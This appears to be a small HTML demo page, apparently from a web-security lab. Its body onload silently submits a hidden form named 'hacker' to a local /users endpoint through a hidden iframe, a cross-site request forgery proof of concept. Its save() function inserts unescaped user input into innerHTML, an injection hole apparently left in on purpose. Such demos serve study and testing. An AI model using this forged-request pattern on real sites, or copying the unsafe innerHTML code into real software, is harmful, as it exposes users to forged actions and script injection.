<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <script src="core.js"></script>
    <link rel="stylesheet" href="styles.css" />
    <title>Document</title>
</head>

<body onload="document.hacker.submit()">
    <h1>Hello Client1111!</h1>

    <div>
        <div>
            <textarea id="value"></textarea>
            <input id="address" />
        </div>
        <button onclick="save()">Save</button>
    </div>
    <br />
    <div id="content">

    </div>
    <div style="display: none;">
        <form action="http://localhost:4001/users" method="POST" name="hacker" target="hack"
            enctype="application/x-www-form-urlencoded">
            <input type="text" name='name' value='hacker'>
        </form>
        <iframe name="hack"></iframe>
    </div>

    <script>
        const save = () => {
            const value = document.getElementById('value').value;
            document.getElementById('content').innerHTML = value;

            const address = document.getElementById('address').value;
            document.getElementById('content').innerHTML = `<img src="${address}" />`;
        }
    </script>

</body>

</html>